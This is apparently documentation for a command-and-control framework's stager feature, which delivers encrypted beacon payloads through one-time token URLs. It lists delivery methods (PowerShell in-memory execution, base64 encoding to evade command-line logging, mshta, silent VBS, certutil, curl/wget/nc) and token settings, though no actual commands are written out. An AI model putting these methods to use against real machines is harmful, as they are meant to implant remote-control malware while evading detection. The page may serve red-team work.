Stager
Stager
Section titled “Stager”The stager system lets you deliver beacons via a one-time token URL. The payload is compressed (GZip) and encrypted (AES-256-CBC) at rest; the decryption key is embedded only in the delivery one-liner.
Delivery methods
Section titled “Delivery methods”A single stager token generates all of these one-liners simultaneously:
| Method | How it works |
|---|---|
| PS IEX | PowerShell downloads the PS1 script and executes it in memory |
| PS EncodedCommand | Same as above, base64-encoded in UTF-16LE to bypass command-line logging |
| HTA (mshta) | VBScript wrapper that downloads and runs the Python beacon |
| VBS | Standalone .vbs that downloads and executes silently via pythonw |
| Python (Linux/Mac) | urllib + SSL bypass one-liner for python3 / python |
| curl / wget / sh | Shell one-liners for Unix targets |
| nc (raw TCP) | Netcat fallback with no HTTP layer |
| certutil | Windows LOLBin download (cmd.exe and PowerShell variants) |
Token settings
Section titled “Token settings”- Max uses — limit how many times the token can be redeemed (e.g.
1for single use) - Expiry time — the token self-destructs after this datetime
- Revoke — invalidate any token immediately from the panel
Using the stager
Section titled “Using the stager”- Go to Stager in the sidebar
- Paste the beacon source code (or generate one first from the Beacon Generator)
- Set max uses and expiry
- Click Create — a token URL is generated
- Copy the desired one-liner and deliver it to the target
- Stager tokens bypass the IP whitelist by design — they are meant to be used from target machines
- The payload is never stored in plaintext; the AES key is only in the delivery one-liner
- Tokens can be revoked at any time even if the max-use limit has not been reached